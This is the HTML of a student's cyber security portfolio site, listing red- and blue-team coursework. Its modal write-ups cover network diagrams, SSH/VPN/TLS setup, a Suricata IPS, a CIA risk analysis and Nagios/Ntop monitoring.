          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
           <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
           </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#09796064496b6c6c626468677a276d6c7f"><span class="__cf_email__" data-cfemail="e191888ca18384848a8c808f92cf858497">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
          <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
